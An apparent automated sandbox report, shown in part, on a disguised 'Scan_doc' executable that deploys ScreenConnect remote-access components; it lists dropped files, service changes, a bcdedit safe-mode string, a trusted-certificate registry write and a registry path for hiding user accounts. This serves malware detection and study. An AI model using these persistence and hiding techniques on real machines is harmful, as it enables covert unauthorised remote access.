Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8A4162 push eax; ret	9_2_00007FFD9B8A4163
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8A30BA push eax; iretd	9_2_00007FFD9B8A30BB
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8A401A push eax; iretd	9_2_00007FFD9B8A401B
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8A3F3A pushad ; retf	9_2_00007FFD9B8A3F3B
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8A2E18 push eax; ret	9_2_00007FFD9B8A2E7B
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Code function: 10_2_018318B1 push 4C056A33h; retf	10_2_018318BD
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Code function: 11_2_05959790 pushfd ; retf	11_2_05959791
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B870028 push eax; retf	12_2_00007FFD9B870029
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB87BE6 push ss; ret	12_2_00007FFD9BB87BE7
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB85370 push eax; ret	12_2_00007FFD9BB853E9
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB85342 push eax; ret	12_2_00007FFD9BB853E9
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB81281 push ebx; iretd	12_2_00007FFD9BB81282
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB8116D push esp; iretd	12_2_00007FFD9BB8116E
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BB8799B push ss; iretd	12_2_00007FFD9BB87A5E
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB7B6D push ecx; ret	13_2_00007FFD9BBB7B7A
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB7B0D push ecx; ret	13_2_00007FFD9BBB7B2A
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBBB9C4 pushfd ; ret	13_2_00007FFD9BBBB9EA
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBBB636 pushfd ; ret	13_2_00007FFD9BBBB67A
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB7E59 push esp; ret	13_2_00007FFD9BBB7E7A
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB7DAC push ebx; ret	13_2_00007FFD9BBB7DCA
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BBB7CDC push edx; ret	13_2_00007FFD9BBB7CFA

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e76a7089-9bd3-460c-8e9c-7b01b18dcd91)

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1963256182.0000000003322000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2960868072.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020718098.0000000002DF0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Stores large binary data to the registry

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
